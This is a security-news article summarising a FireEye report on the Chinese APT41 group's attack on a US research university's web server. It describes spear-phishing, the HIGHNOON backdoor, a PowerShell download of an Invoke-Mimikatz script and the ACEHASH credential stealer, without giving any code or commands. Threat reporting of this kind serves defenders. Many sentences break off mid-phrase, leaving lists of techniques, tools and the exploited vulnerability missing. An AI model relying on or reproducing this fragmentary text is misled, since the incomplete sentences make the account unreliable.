Experts at FireEye observed Chinese APT41 APT group targeting a web server at a U.S.-based research university.
The APT41 has been active since at least 2012, it was involved in both state-sponsored espionage campaigns and financially-motivated attacks since 2014. The group hit entities in several industries, including the gaming, healthcare, high-tech, higher education, telecommunications, and travel services industries.
Unlike other China-based actors, the group used custom malware in cyber espionage operations, experts observed 46 different malware families and tools in APT41 campaigns.
“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain.” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”
APT41 leverages several techniques to carry out the initial compromise, including
Experts observed APT41 using spear-phishing email with attachments such as compiled HTML (
The arsenal of the group includes
The attack against a publicly-accessible web server at a U
The attack involved two additional files, the HIGHNOON backdoor and a
“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a
Attackers used the HIGHNOON backdoor to execute a PowerShell command and download a script from PowerSploit. This script appears to be a copy of Invoke-Mimikatz
The hackers also conducted additional reconnaissance and downloaded two additional files, representing the dropper and encrypted/compressed payload components of the ACEHASH malware. The ACEHASH malware is a credential stealer and password dumping utility.
Summarizing the hackers were able to exploit the vulnerability in